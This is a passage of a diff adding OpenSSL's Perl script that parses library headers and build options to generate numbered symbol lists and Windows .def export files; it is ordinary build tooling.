+# part of.  This will allow easy translating to .def files or the corresponding
+# file in other operating systems (a .opt file for VMS, possibly with a .mar
+# file).
+#
+# The format now becomes:
+#
+#	routine-name	nnnn	info
+#
+# and the "info" part is actually a colon-separated string of fields with
+# the following meaning:
+#
+#	existence:platform:kind:algorithms
+#
+# - "existence" can be "EXIST" or "NOEXIST" depending on if the symbol is
+#   found somewhere in the source, 
+# - "platforms" is empty if it exists on all platforms, otherwise it contains
+#   comma-separated list of the platform, just as they are if the symbol exists
+#   for those platforms, or prepended with a "!" if not.  This helps resolve
+#   symbol name variants for platforms where the names are too long for the
+#   compiler or linker, or if the systems is case insensitive and there is a
+#   clash, or the symbol is implemented differently (see
+#   EXPORT_VAR_AS_FUNCTION).  This script assumes renaming of symbols is found
+#   in the file crypto/symhacks.h.
+#   The semantics for the platforms is that every item is checked against the
+#   environment.  For the negative items ("!FOO"), if any of them is false
+#   (i.e. "FOO" is true) in the environment, the corresponding symbol can't be
+#   used.  For the positive itms, if all of them are false in the environment,
+#   the corresponding symbol can't be used.  Any combination of positive and
+#   negative items are possible, and of course leave room for some redundancy.
+# - "kind" is "FUNCTION" or "VARIABLE".  The meaning of that is obvious.
+# - "algorithms" is a comma-separated list of algorithm names.  This helps
+#   exclude symbols that are part of an algorithm that some user wants to
+#   exclude.
+#
+
+my $debug=0;
+
+my $crypto_num= "util/libeay.num";
+my $ssl_num=    "util/ssleay.num";
+my $libname;
+
+my $do_update = 0;
+my $do_rewrite = 1;
+my $do_crypto = 0;
+my $do_ssl = 0;
+my $do_ctest = 0;
+my $do_ctestall = 0;
+my $do_checkexist = 0;
+
+my $VMSVAX=0;
+my $VMSNonVAX=0;
+my $VMS=0;
+my $W32=0;
+my $W16=0;
+my $NT=0;
+my $OS2=0;
+# Set this to make typesafe STACK definitions appear in DEF
+my $safe_stack_def = 0;
+
+my @known_platforms = ( "__FreeBSD__", "PERL5", "NeXT",
+			"EXPORT_VAR_AS_FUNCTION", "ZLIB", "OPENSSL_FIPS" );
+my @known_ossl_platforms = ( "VMS", "WIN16", "WIN32", "WINNT", "OS2" );
+my @known_algorithms = ( "RC2", "RC4", "RC5", "IDEA", "DES", "BF",
+			 "CAST", "MD2", "MD4", "MD5", "SHA", "SHA0", "SHA1",
+			 "SHA256", "SHA512", "RIPEMD",
+			 "MDC2", "WHIRLPOOL", "RSA", "DSA", "DH", "EC", "ECDH", "ECDSA", "EC2M",
+			 "HMAC", "AES", "CAMELLIA", "SEED", "GOST",
+			 # EC_NISTP_64_GCC_128
+			 "EC_NISTP_64_GCC_128",
+			 # Envelope "algorithms"
+			 "EVP", "X509", "ASN1_TYPEDEFS",
+			 # Helper "algorithms"
+			 "BIO", "COMP", "BUFFER", "LHASH", "STACK", "ERR",
+			 "LOCKING",
+			 # External "algorithms"
+			 "FP_API", "STDIO", "SOCK", "KRB5", "DGRAM",
+			 # Engines
+			 "STATIC_ENGINE", "ENGINE", "HW", "GMP",
+			 # RFC3779
+			 "RFC3779",
+			 # TLS
+			 "TLSEXT", "PSK", "SRP", "HEARTBEATS",
+			 # CMS
+			 "CMS",
+			 # CryptoAPI Engine
+			 "CAPIENG",
+			 # SSL v2
+			 "SSL2",
+			 # SSL v3 method
+			 "SSL3_METHOD",
+			 # JPAKE
+			 "JPAKE",
+			 # NEXTPROTONEG
+			 "NEXTPROTONEG",
+			 # Deprecated functions
+			 "DEPRECATED",
+			 # Hide SSL internals
+			 "SSL_INTERN",
+			 # SCTP
+		 	 "SCTP",
+			 # SRTP
+			 "SRTP",
+			 # SSL TRACE
+		 	 "SSL_TRACE",
+			 # Unit testing
+			 "UNIT_TEST");
+
+my $options="";
+open(IN,"<Makefile") || die "unable to open Makefile!\n";
+while(<IN>) {
+    $options=$1 if (/^OPTIONS=(.*)$/);
+}
+close(IN);
+
+# The following ciphers may be excluded (by Configure). This means functions
+# defined with ifndef(NO_XXX) are not included in the .def file, and everything
+# in directory xxx is ignored.
+my $no_rc2; my $no_rc4; my $no_rc5; my $no_idea; my $no_des; my $no_bf;
+my $no_cast; my $no_whirlpool; my $no_camellia; my $no_seed;
+my $no_md2; my $no_md4; my $no_md5; my $no_sha; my $no_ripemd; my $no_mdc2;
+my $no_rsa; my $no_dsa; my $no_dh; my $no_hmac=0; my $no_aes; my $no_krb5;
+my $no_ec; my $no_ecdsa; my $no_ecdh; my $no_engine; my $no_hw;
+my $no_fp_api; my $no_static_engine=1; my $no_gmp; my $no_deprecated;
+my $no_rfc3779; my $no_psk; my $no_tlsext; my $no_cms; my $no_capieng;
+my $no_jpake; my $no_srp; my $no_ssl2; my $no_ec2m; my $no_nistp_gcc; 
+my $no_nextprotoneg; my $no_sctp; my $no_srtp; my $no_ssl_trace;
+my $no_unit_test; my $no_ssl3_method;
+
+my $fips;
+
+my $zlib;
+
+
+foreach (@ARGV, split(/ /, $options))
+	{
+	$debug=1 if $_ eq "debug";
+	$W32=1 if $_ eq "32";
+	$W16=1 if $_ eq "16";
+	if($_ eq "NT") {
+		$W32 = 1;
+		$NT = 1;
+	}
+	if ($_ eq "VMS-VAX") {
+		$VMS=1;
+		$VMSVAX=1;
+	}
+	if ($_ eq "VMS-NonVAX") {
+		$VMS=1;
+		$VMSNonVAX=1;
+	}
+	$VMS=1 if $_ eq "VMS";
+	$OS2=1 if $_ eq "OS2";
+	$fips=1 if /^fips/;
+	if ($_ eq "zlib" || $_ eq "enable-zlib" || $_ eq "zlib-dynamic"
+			 || $_ eq "enable-zlib-dynamic") {
+		$zlib = 1;
+	}
+
+	$do_ssl=1 if $_ eq "ssleay";
+	if ($_ eq "ssl") {
+		$do_ssl=1; 
+		$libname=$_
+	}
+	$do_crypto=1 if $_ eq "libeay";
+	if ($_ eq "crypto") {
+		$do_crypto=1;
+		$libname=$_;
+	}
+	$no_static_engine=1 if $_ eq "no-static-engine";
+	$no_static_engine=0 if $_ eq "enable-static-engine";
+	$do_update=1 if $_ eq "update";
+	$do_rewrite=1 if $_ eq "rewrite";
+	$do_ctest=1 if $_ eq "ctest";
+	$do_ctestall=1 if $_ eq "ctestall";
+	$do_checkexist=1 if $_ eq "exist";
+	#$safe_stack_def=1 if $_ eq "-DDEBUG_SAFESTACK";
+
+	if    (/^no-rc2$/)      { $no_rc2=1; }
+	elsif (/^no-rc4$/)      { $no_rc4=1; }
+	elsif (/^no-rc5$/)      { $no_rc5=1; }
+	elsif (/^no-idea$/)     { $no_idea=1; }
+	elsif (/^no-des$/)      { $no_des=1; $no_mdc2=1; }
+	elsif (/^no-bf$/)       { $no_bf=1; }
+	elsif (/^no-cast$/)     { $no_cast=1; }
+	elsif (/^no-whirlpool$/)     { $no_whirlpool=1; }
+	elsif (/^no-md2$/)      { $no_md2=1; }
+	elsif (/^no-md4$/)      { $no_md4=1; }
+	elsif (/^no-md5$/)      { $no_md5=1; }
+	elsif (/^no-sha$/)      { $no_sha=1; }
+	elsif (/^no-ripemd$/)   { $no_ripemd=1; }
+	elsif (/^no-mdc2$/)     { $no_mdc2=1; }
+	elsif (/^no-rsa$/)      { $no_rsa=1; }
+	elsif (/^no-dsa$/)      { $no_dsa=1; }
+	elsif (/^no-dh$/)       { $no_dh=1; }
+	elsif (/^no-ec$/)       { $no_ec=1; }
+	elsif (/^no-ecdsa$/)	{ $no_ecdsa=1; }
+	elsif (/^no-ecdh$/) 	{ $no_ecdh=1; }
+	elsif (/^no-hmac$/)	{ $no_hmac=1; }
+	elsif (/^no-aes$/)	{ $no_aes=1; }
+	elsif (/^no-camellia$/)	{ $no_camellia=1; }
+	elsif (/^no-seed$/)     { $no_seed=1; }
+	elsif (/^no-evp$/)	{ $no_evp=1; }
+	elsif (/^no-lhash$/)	{ $no_lhash=1; }
+	elsif (/^no-stack$/)	{ $no_stack=1; }
+	elsif (/^no-err$/)	{ $no_err=1; }
+	elsif (/^no-buffer$/)	{ $no_buffer=1; }
+	elsif (/^no-bio$/)	{ $no_bio=1; }
+	#elsif (/^no-locking$/)	{ $no_locking=1; }
+	elsif (/^no-comp$/)	{ $no_comp=1; }
+	elsif (/^no-dso$/)	{ $no_dso=1; }
+	elsif (/^no-krb5$/)	{ $no_krb5=1; }
+	elsif (/^no-engine$/)	{ $no_engine=1; }
+	elsif (/^no-hw$/)	{ $no_hw=1; }
+	elsif (/^no-gmp$/)	{ $no_gmp=1; }
+	elsif (/^no-rfc3779$/)	{ $no_rfc3779=1; }
+	elsif (/^no-tlsext$/)	{ $no_tlsext=1; }
+	elsif (/^no-cms$/)	{ $no_cms=1; }
+	elsif (/^no-ec2m$/)	{ $no_ec2m=1; }
+	elsif (/^no-ec_nistp_64_gcc_128$/)	{ $no_nistp_gcc=1; }
+	elsif (/^no-nextprotoneg$/)	{ $no_nextprotoneg=1; }
+	elsif (/^no-ssl2$/)	{ $no_ssl2=1; }
+	elsif (/^no-ssl3-method$/) { $no_ssl3_method=1; }
+	elsif (/^no-ssl-trace$/) { $no_ssl_trace=1; }
+	elsif (/^no-capieng$/)	{ $no_capieng=1; }
+	elsif (/^no-jpake$/)	{ $no_jpake=1; }
+	elsif (/^no-srp$/)	{ $no_srp=1; }
+	elsif (/^no-sctp$/)	{ $no_sctp=1; }
+	elsif (/^no-srtp$/)	{ $no_srtp=1; }
+	elsif (/^no-unit-test$/){ $no_unit_test=1; }
+	}
+
+
+if (!$libname) { 
+	if ($do_ssl) {
+		$libname="SSLEAY";
+	}
+	if ($do_crypto) {
+		$libname="LIBEAY";
+	}
+}
+
+# If no platform is given, assume WIN32
+if ($W32 + $W16 + $VMS + $OS2 == 0) {
+	$W32 = 1;
+}
+
+# Add extra knowledge
+if ($W16) {
+	$no_fp_api=1;
+}
+
+if (!$do_ssl && !$do_crypto)
+	{
+	print STDERR "usage: $0 ( ssl | crypto ) [ 16 | 32 | NT | OS2 ]\n";
+	exit(1);
+	}
+
+%ssl_list=&load_numbers($ssl_num);
+$max_ssl = $max_num;
+%crypto_list=&load_numbers($crypto_num);
+$max_crypto = $max_num;
+
+my $ssl="ssl/ssl.h";
+$ssl.=" ssl/kssl.h";
+$ssl.=" ssl/tls1.h";
+$ssl.=" ssl/srtp.h";
+
+my $crypto ="crypto/crypto.h";
+$crypto.=" crypto/cryptlib.h";
+$crypto.=" crypto/o_dir.h";
+$crypto.=" crypto/o_str.h";
+$crypto.=" crypto/o_time.h";
+$crypto.=" crypto/des/des.h crypto/des/des_old.h" ; # unless $no_des;
+$crypto.=" crypto/idea/idea.h" ; # unless $no_idea;
+$crypto.=" crypto/rc4/rc4.h" ; # unless $no_rc4;
+$crypto.=" crypto/rc5/rc5.h" ; # unless $no_rc5;
+$crypto.=" crypto/rc2/rc2.h" ; # unless $no_rc2;
+$crypto.=" crypto/bf/blowfish.h" ; # unless $no_bf;
+$crypto.=" crypto/cast/cast.h" ; # unless $no_cast;
+$crypto.=" crypto/whrlpool/whrlpool.h" ;
+$crypto.=" crypto/md2/md2.h" ; # unless $no_md2;
+$crypto.=" crypto/md4/md4.h" ; # unless $no_md4;
+$crypto.=" crypto/md5/md5.h" ; # unless $no_md5;
+$crypto.=" crypto/mdc2/mdc2.h" ; # unless $no_mdc2;
+$crypto.=" crypto/sha/sha.h" ; # unless $no_sha;
+$crypto.=" crypto/ripemd/ripemd.h" ; # unless $no_ripemd;
+$crypto.=" crypto/aes/aes.h" ; # unless $no_aes;
+$crypto.=" crypto/camellia/camellia.h" ; # unless $no_camellia;
+$crypto.=" crypto/seed/seed.h"; # unless $no_seed;
+
+$crypto.=" crypto/bn/bn.h";
+$crypto.=" crypto/rsa/rsa.h" ; # unless $no_rsa;
+$crypto.=" crypto/dsa/dsa.h" ; # unless $no_dsa;
+$crypto.=" crypto/dh/dh.h" ; # unless $no_dh;
+$crypto.=" crypto/ec/ec.h" ; # unless $no_ec;
+$crypto.=" crypto/ecdsa/ecdsa.h" ; # unless $no_ecdsa;
+$crypto.=" crypto/ecdh/ecdh.h" ; # unless $no_ecdh;
+$crypto.=" crypto/hmac/hmac.h" ; # unless $no_hmac;
+$crypto.=" crypto/cmac/cmac.h" ; # unless $no_hmac;
+
+$crypto.=" crypto/engine/engine.h"; # unless $no_engine;
+$crypto.=" crypto/stack/stack.h" ; # unless $no_stack;
+$crypto.=" crypto/buffer/buffer.h" ; # unless $no_buffer;
+$crypto.=" crypto/bio/bio.h" ; # unless $no_bio;
+$crypto.=" crypto/dso/dso.h" ; # unless $no_dso;
+$crypto.=" crypto/lhash/lhash.h" ; # unless $no_lhash;
+$crypto.=" crypto/conf/conf.h";
+$crypto.=" crypto/txt_db/txt_db.h";
+
+$crypto.=" crypto/evp/evp.h" ; # unless $no_evp;
+$crypto.=" crypto/objects/objects.h";
+$crypto.=" crypto/pem/pem.h";
+#$crypto.=" crypto/meth/meth.h";
+$crypto.=" crypto/asn1/asn1.h";
+$crypto.=" crypto/asn1/asn1t.h";
+$crypto.=" crypto/asn1/asn1_mac.h";
+$crypto.=" crypto/err/err.h" ; # unless $no_err;
+$crypto.=" crypto/pkcs7/pkcs7.h";
+$crypto.=" crypto/pkcs12/pkcs12.h";
+$crypto.=" crypto/x509/x509.h";
+$crypto.=" crypto/x509/x509_vfy.h";
+$crypto.=" crypto/x509v3/x509v3.h";
+$crypto.=" crypto/ts/ts.h";
+$crypto.=" crypto/rand/rand.h";
+$crypto.=" crypto/comp/comp.h" ; # unless $no_comp;
+$crypto.=" crypto/ocsp/ocsp.h";
+$crypto.=" crypto/ui/ui.h crypto/ui/ui_compat.h";
+$crypto.=" crypto/krb5/krb5_asn.h";
+#$crypto.=" crypto/store/store.h";
+$crypto.=" crypto/pqueue/pqueue.h";
+$crypto.=" crypto/cms/cms.h";
+$crypto.=" crypto/jpake/jpake.h";
+$crypto.=" crypto/modes/modes.h";
+$crypto.=" crypto/srp/srp.h";
+
+my $symhacks="crypto/symhacks.h";
+
+my @ssl_symbols = &do_defs("SSLEAY", $ssl, $symhacks);
+my @crypto_symbols = &do_defs("LIBEAY", $crypto, $symhacks);
+
+if ($do_update) {
+
+if ($do_ssl == 1) {
+
+	&maybe_add_info("SSLEAY",*ssl_list,@ssl_symbols);
+	if ($do_rewrite == 1) {
+		open(OUT, ">$ssl_num");
+		&rewrite_numbers(*OUT,"SSLEAY",*ssl_list,@ssl_symbols);
+	} else {
+		open(OUT, ">>$ssl_num");
+	}
+	&update_numbers(*OUT,"SSLEAY",*ssl_list,$max_ssl,@ssl_symbols);
+	close OUT;
+}
+
+if($do_crypto == 1) {
+
+	&maybe_add_info("LIBEAY",*crypto_list,@crypto_symbols);
+	if ($do_rewrite == 1) {
+		open(OUT, ">$crypto_num");
+		&rewrite_numbers(*OUT,"LIBEAY",*crypto_list,@crypto_symbols);
+	} else {
+		open(OUT, ">>$crypto_num");
+	}
+	&update_numbers(*OUT,"LIBEAY",*crypto_list,$max_crypto,@crypto_symbols);
+	close OUT;
+} 
+
+} elsif ($do_checkexist) {
+	&check_existing(*ssl_list, @ssl_symbols)
+		if $do_ssl == 1;
+	&check_existing(*crypto_list, @crypto_symbols)
+		if $do_crypto == 1;
+} elsif ($do_ctest || $do_ctestall) {
+
+	print <<"EOF";
+
+/* Test file to check all DEF file symbols are present by trying
+ * to link to all of them. This is *not* intended to be run!
+ */
+
+int main()
+{
+EOF
+	&print_test_file(*STDOUT,"SSLEAY",*ssl_list,$do_ctestall,@ssl_symbols)
+		if $do_ssl == 1;
+
+	&print_test_file(*STDOUT,"LIBEAY",*crypto_list,$do_ctestall,@crypto_symbols)
+		if $do_crypto == 1;
+
+	print "}\n";
+
+} else {
+
+	&print_def_file(*STDOUT,$libname,*ssl_list,@ssl_symbols)
+		if $do_ssl == 1;
+
+	&print_def_file(*STDOUT,$libname,*crypto_list,@crypto_symbols)
+		if $do_crypto == 1;
+
+}
+
+
+sub do_defs
+{
+	my($name,$files,$symhacksfile)=@_;
+	my $file;
+	my @ret;
+	my %syms;
+	my %platform;		# For anything undefined, we assume ""
+	my %kind;		# For anything undefined, we assume "FUNCTION"
+	my %algorithm;		# For anything undefined, we assume ""
+	my %variant;
+	my %variant_cnt;	# To be able to allocate "name{n}" if "name"
+				# is the same name as the original.
+	my $cpp;
+	my %unknown_algorithms = ();
+
+	foreach $file (split(/\s+/,$symhacksfile." ".$files))
+		{
+		print STDERR "DEBUG: starting on $file:\n" if $debug;
+		open(IN,"<$file") || die "unable to open $file:$!\n";
+		my $line = "", my $def= "";
+		my %tag = (
+			(map { $_ => 0 } @known_platforms),
+			(map { "OPENSSL_SYS_".$_ => 0 } @known_ossl_platforms),
+			(map { "OPENSSL_NO_".$_ => 0 } @known_algorithms),
+			NOPROTO		=> 0,
+			PERL5		=> 0,
+			_WINDLL		=> 0,
+			CONST_STRICT	=> 0,
+			TRUE		=> 1,
+		);
+		my $symhacking = $file eq $symhacksfile;
+		my @current_platforms = ();
+		my @current_algorithms = ();
+
+		# params: symbol, alias, platforms, kind
+		# The reason to put this subroutine in a variable is that
+		# it will otherwise create it's own, unshared, version of
+		# %tag and %variant...
+		my $make_variant = sub
+		{
+			my ($s, $a, $p, $k) = @_;
+			my ($a1, $a2);
+
+			print STDERR "DEBUG: make_variant: Entered with ",$s,", ",$a,", ",(defined($p)?$p:""),", ",(defined($k)?$k:""),"\n" if $debug;
+			if (defined($p))
+			{
+				$a1 = join(",",$p,
+					   grep(!/^$/,
+						map { $tag{$_} == 1 ? $_ : "" }
+						@known_platforms));
+			}
+			else
+			{
+				$a1 = join(",",
+					   grep(!/^$/,
+						map { $tag{$_} == 1 ? $_ : "" }
+						@known_platforms));
+			}
+			$a2 = join(",",
+				   grep(!/^$/,
+					map { $tag{"OPENSSL_SYS_".$_} == 1 ? $_ : "" }
+					@known_ossl_platforms));
+			print STDERR "DEBUG: make_variant: a1 = $a1; a2 = $a2\n" if $debug;
+			if ($a1 eq "") { $a1 = $a2; }
+			elsif ($a1 ne "" && $a2 ne "") { $a1 .= ",".$a2; }
+			if ($a eq $s)
+			{
+				if (!defined($variant_cnt{$s}))
+				{
+					$variant_cnt{$s} = 0;
+				}
+				$variant_cnt{$s}++;
+				$a .= "{$variant_cnt{$s}}";
+			}
+			my $toadd = $a.":".$a1.(defined($k)?":".$k:"");
+			my $togrep = $s.'(\{[0-9]+\})?:'.$a1.(defined($k)?":".$k:"");
+			if (!grep(/^$togrep$/,
+				  split(/;/, defined($variant{$s})?$variant{$s}:""))) {
+				if (defined($variant{$s})) { $variant{$s} .= ";"; }
+				$variant{$s} .= $toadd;
+			}
+			print STDERR "DEBUG: make_variant: Exit with variant of ",$s," = ",$variant{$s},"\n" if $debug;
+		};
+
+		print STDERR "DEBUG: parsing ----------\n" if $debug;
+		while(<IN>) {
+			if (/\/\* Error codes for the \w+ functions\. \*\//)
+				{
+				undef @tag;
+				last;
+				}
+			if ($line ne '') {
+				$_ = $line . $_;
+				$line = '';
+			}
+
+			if (/\\$/) {
+				chomp; # remove eol
+				chop; # remove ending backslash
+				$line = $_;
+				next;
+			}
+
+			if(/\/\*/) {
+				if (not /\*\//) {	# multiline comment...
+					$line = $_;	# ... just accumulate
+					next;
+				} else {
+					s/\/\*.*?\*\///gs;# wipe it
+				}
+			}
+
+			if ($cpp) {
+				$cpp++ if /^#\s*if/;
+				$cpp-- if /^#\s*endif/;
+				next;
+	    		}
+			$cpp = 1 if /^#.*ifdef.*cplusplus/;
+
+			s/{[^{}]*}//gs;                      # ignore {} blocks
+			print STDERR "DEBUG: \$def=\"$def\"\n" if $debug && $def ne "";
+			print STDERR "DEBUG: \$_=\"$_\"\n" if $debug;
+			if (/^\#\s*ifndef\s+(.*)/) {
+				push(@tag,"-");
+				push(@tag,$1);
+				$tag{$1}=-1;
+				print STDERR "DEBUG: $file: found tag $1 = -1\n" if $debug;
+			} elsif (/^\#\s*if\s+!defined\(([^\)]+)\)/) {
+				push(@tag,"-");
+				if (/^\#\s*if\s+(!defined\(([^\)]+)\)(\s+\&\&\s+!defined\(([^\)]+)\))*)$/) {
+					my $tmp_1 = $1;
+					my $tmp_;
+					foreach $tmp_ (split '\&\&',$tmp_1) {
+						$tmp_ =~ /!defined\(([^\)]+)\)/;
+						print STDERR "DEBUG: $file: found tag $1 = -1\n" if $debug;
+						push(@tag,$1);
+						$tag{$1}=-1;
+					}
+				} else {
+					print STDERR "Warning: $file: complicated expression: $_" if $debug; # because it is O...
+					print STDERR "DEBUG: $file: found tag $1 = -1\n" if $debug;
+					push(@tag,$1);
+					$tag{$1}=-1;
+				}
+			} elsif (/^\#\s*ifdef\s+(\S*)/) {
+				push(@tag,"-");
+				push(@tag,$1);
+				$tag{$1}=1;
+				print STDERR "DEBUG: $file: found tag $1 = 1\n" if $debug;
+			} elsif (/^\#\s*if\s+defined\(([^\)]+)\)/) {
+				push(@tag,"-");
+				if (/^\#\s*if\s+(defined\(([^\)]+)\)(\s+\|\|\s+defined\(([^\)]+)\))*)$/) {
+					my $tmp_1 = $1;
+					my $tmp_;
+					foreach $tmp_ (split '\|\|',$tmp_1) {
+						$tmp_ =~ /defined\(([^\)]+)\)/;
+						print STDERR "DEBUG: $file: found tag $1 = 1\n" if $debug;
+						push(@tag,$1);
+						$tag{$1}=1;
+					}
+				} else {
+					print STDERR "Warning: $file: complicated expression: $_\n" if $debug; # because it is O...
+					print STDERR "DEBUG: $file: found tag $1 = 1\n" if $debug;
+					push(@tag,$1);
+					$tag{$1}=1;
+				}
+			} elsif (/^\#\s*error\s+(\w+) is disabled\./) {
+				my $tag_i = $#tag;
+				while($tag[$tag_i] ne "-") {
+					if ($tag[$tag_i] eq "OPENSSL_NO_".$1) {
+						$tag{$tag[$tag_i]}=2;
+						print STDERR "DEBUG: $file: chaged tag $1 = 2\n" if $debug;
+					}
+					$tag_i--;
+				}
+			} elsif (/^\#\s*endif/) {
+				my $tag_i = $#tag;
+				while($tag_i > 0 && $tag[$tag_i] ne "-") {
+					my $t=$tag[$tag_i];
+					print STDERR "DEBUG: \$t=\"$t\"\n" if $debug;
+					if ($tag{$t}==2) {
+						$tag{$t}=-1;
+					} else {
+						$tag{$t}=0;
+					}
+					print STDERR "DEBUG: $file: changed tag ",$t," = ",$tag{$t},"\n" if $debug;
+					pop(@tag);
+					if ($t =~ /^OPENSSL_NO_([A-Z0-9_]+)$/) {
+						$t=$1;
+					} else {
+						$t="";
+					}
+					if ($t ne ""
+					    && !grep(/^$t$/, @known_algorithms)) {
+						$unknown_algorithms{$t} = 1;
+						#print STDERR "DEBUG: Added as unknown algorithm: $t\n" if $debug;
+					}
+					$tag_i--;
+				}
+				pop(@tag);
+			} elsif (/^\#\s*else/) {
+				my $tag_i = $#tag;
+				while($tag[$tag_i] ne "-") {
+					my $t=$tag[$tag_i];
+					$tag{$t}= -$tag{$t};
+					print STDERR "DEBUG: $file: changed tag ",$t," = ",$tag{$t},"\n" if $debug;
+					$tag_i--;
+				}
+			} elsif (/^\#\s*if\s+1/) {
+				push(@tag,"-");
+				# Dummy tag
+				push(@tag,"TRUE");
+				$tag{"TRUE"}=1;
+				print STDERR "DEBUG: $file: found 1\n" if $debug;
+			} elsif (/^\#\s*if\s+0/) {
+				push(@tag,"-");
+				# Dummy tag
+				push(@tag,"TRUE");
+				$tag{"TRUE"}=-1;
+				print STDERR "DEBUG: $file: found 0\n" if $debug;
+			} elsif (/^\#\s*define\s+(\w+)\s+(\w+)/
+				 && $symhacking && $tag{'TRUE'} != -1) {
+				# This is for aliasing.  When we find an alias,
+				# we have to invert
+				&$make_variant($1,$2);
+				print STDERR "DEBUG: $file: defined $1 = $2\n" if $debug;
+			}
+			if (/^\#/) {
+				@current_platforms =
+				    grep(!/^$/,
+					 map { $tag{$_} == 1 ? $_ :
+						   $tag{$_} == -1 ? "!".$_  : "" }
+					 @known_platforms);
+				push @current_platforms
+				    , grep(!/^$/,
+					   map { $tag{"OPENSSL_SYS_".$_} == 1 ? $_ :
+						     $tag{"OPENSSL_SYS_".$_} == -1 ? "!".$_  : "" }
+					   @known_ossl_platforms);
+				@current_algorithms =
+				    grep(!/^$/,
+					 map { $tag{"OPENSSL_NO_".$_} == -1 ? $_ : "" }
+					 @known_algorithms);
+				$def .=
+				    "#INFO:"
+					.join(',',@current_platforms).":"
+					    .join(',',@current_algorithms).";";
+				next;
+			}
+			if ($tag{'TRUE'} != -1) {
+				if (/^\s*DECLARE_STACK_OF\s*\(\s*(\w*)\s*\)/) {
+					next;
+				} elsif (/^\s*DECLARE_ASN1_ENCODE_FUNCTIONS\s*\(\s*(\w*)\s*,\s*(\w*)\s*,\s*(\w*)\s*\)/) {
+					$def .= "int d2i_$3(void);";
+					$def .= "int i2d_$3(void);";
+					# Variant for platforms that do not
+					# have to access globale variables
+					# in shared libraries through functions
+					$def .=
+					    "#INFO:"
+						.join(',',"!EXPORT_VAR_AS_FUNCTION",@current_platforms).":"
+						    .join(',',@current_algorithms).";";
+					$def .= "OPENSSL_EXTERN int $2_it;";
+					$def .=
+					    "#INFO:"
+						.join(',',@current_platforms).":"
+						    .join(',',@current_algorithms).";";
+					# Variant for platforms that have to
+					# access globale variables in shared
+					# libraries through functions
+					&$make_variant("$2_it","$2_it",
+						      "EXPORT_VAR_AS_FUNCTION",
+						      "FUNCTION");
+					next;
+				} elsif (/^\s*DECLARE_ASN1_FUNCTIONS_fname\s*\(\s*(\w*)\s*,\s*(\w*)\s*,\s*(\w*)\s*\)/) {
+					$def .= "int d2i_$3(void);";
+					$def .= "int i2d_$3(void);";
+					$def .= "int $3_free(void);";
+					$def .= "int $3_new(void);";
+					# Variant for platforms that do not
+					# have to access globale variables
+					# in shared libraries through functions
+					$def .=
+					    "#INFO:"
+						.join(',',"!EXPORT_VAR_AS_FUNCTION",@current_platforms).":"
+						    .join(',',@current_algorithms).";";
+					$def .= "OPENSSL_EXTERN int $2_it;";
+					$def .=
+					    "#INFO:"
+						.join(',',@current_platforms).":"
+						    .join(',',@current_algorithms).";";
+					# Variant for platforms that have to
+					# access globale variables in shared
+					# libraries through functions
+					&$make_variant("$2_it","$2_it",
+						      "EXPORT_VAR_AS_FUNCTION",
+						      "FUNCTION");
+					next;
+				} elsif (/^\s*DECLARE_ASN1_FUNCTIONS\s*\(\s*(\w*)\s*\)/ ||
+					 /^\s*DECLARE_ASN1_FUNCTIONS_const\s*\(\s*(\w*)\s*\)/) {
+					$def .= "int d2i_$1(void);";
+					$def .= "int i2d_$1(void);";
+					$def .= "int $1_free(void);";
+					$def .= "int $1_new(void);";
+					# Variant for platforms that do not
+					# have to access globale variables
+					# in shared libraries through functions
+					$def .=
+					    "#INFO:"
+						.join(',',"!EXPORT_VAR_AS_FUNCTION",@current_platforms).":"
+						    .join(',',@current_algorithms).";";
+					$def .= "OPENSSL_EXTERN int $1_it;";
+					$def .=
+					    "#INFO:"
+						.join(',',@current_platforms).":"
+						    .join(',',@current_algorithms).";";
+					# Variant for platforms that have to
+					# access globale variables in shared
+					# libraries through functions
+					&$make_variant("$1_it","$1_it",
+						      "EXPORT_VAR_AS_FUNCTION",
+						      "FUNCTION");
+					next;
+				} elsif (/^\s*DECLARE_ASN1_ENCODE_FUNCTIONS_const\s*\(\s*(\w*)\s*,\s*(\w*)\s*\)/) {
+					$def .= "int d2i_$2(void);";
+					$def .= "int i2d_$2(void);";
+					# Variant for platforms that do not
+					# have to access globale variables
+					# in shared libraries through functions
+					$def .=
+					    "#INFO:"
+						.join(',',"!EXPORT_VAR_AS_FUNCTION",@current_platforms).":"
+						    .join(',',@current_algorithms).";";
+					$def .= "OPENSSL_EXTERN int $2_it;";
+					$def .=
+					    "#INFO:"
+						.join(',',@current_platforms).":"
+						    .join(',',@current_algorithms).";";
+					# Variant for platforms that have to
+					# access globale variables in shared
+					# libraries through functions
+					&$make_variant("$2_it","$2_it",
+						      "EXPORT_VAR_AS_FUNCTION",
+						      "FUNCTION");
+					next;
+				} elsif (/^\s*DECLARE_ASN1_ALLOC_FUNCTIONS\s*\(\s*(\w*)\s*\)/) {
+					$def .= "int $1_free(void);";
+					$def .= "int $1_new(void);";
+					next;
+				} elsif (/^\s*DECLARE_ASN1_FUNCTIONS_name\s*\(\s*(\w*)\s*,\s*(\w*)\s*\)/) {
+					$def .= "int d2i_$2(void);";
+					$def .= "int i2d_$2(void);";
+					$def .= "int $2_free(void);";
+					$def .= "int $2_new(void);";
+					# Variant for platforms that do not
+					# have to access globale variables
+					# in shared libraries through functions
+					$def .=
+					    "#INFO:"
+						.join(',',"!EXPORT_VAR_AS_FUNCTION",@current_platforms).":"
+						    .join(',',@current_algorithms).";";
+					$def .= "OPENSSL_EXTERN int $2_it;";
+					$def .=
+					    "#INFO:"
+						.join(',',@current_platforms).":"
+						    .join(',',@current_algorithms).";";
+					# Variant for platforms that have to
+					# access globale variables in shared
+					# libraries through functions
+					&$make_variant("$2_it","$2_it",
+						      "EXPORT_VAR_AS_FUNCTION",
+						      "FUNCTION");
+					next;
+				} elsif (/^\s*DECLARE_ASN1_ITEM\s*\(\s*(\w*)\s*\)/) {
+					# Variant for platforms that do not
+					# have to access globale variables
+					# in shared libraries through functions
+					$def .=
+					    "#INFO:"
+						.join(',',"!EXPORT_VAR_AS_FUNCTION",@current_platforms).":"
+						    .join(',',@current_algorithms).";";
+					$def .= "OPENSSL_EXTERN int $1_it;";
+					$def .=
+					    "#INFO:"
+						.join(',',@current_platforms).":"
+						    .join(',',@current_algorithms).";";
+					# Variant for platforms that have to
+					# access globale variables in shared
+					# libraries through functions
+					&$make_variant("$1_it","$1_it",
+						      "EXPORT_VAR_AS_FUNCTION",
+						      "FUNCTION");
+					next;
+				} elsif (/^\s*DECLARE_ASN1_NDEF_FUNCTION\s*\(\s*(\w*)\s*\)/) {
+					$def .= "int i2d_$1_NDEF(void);";
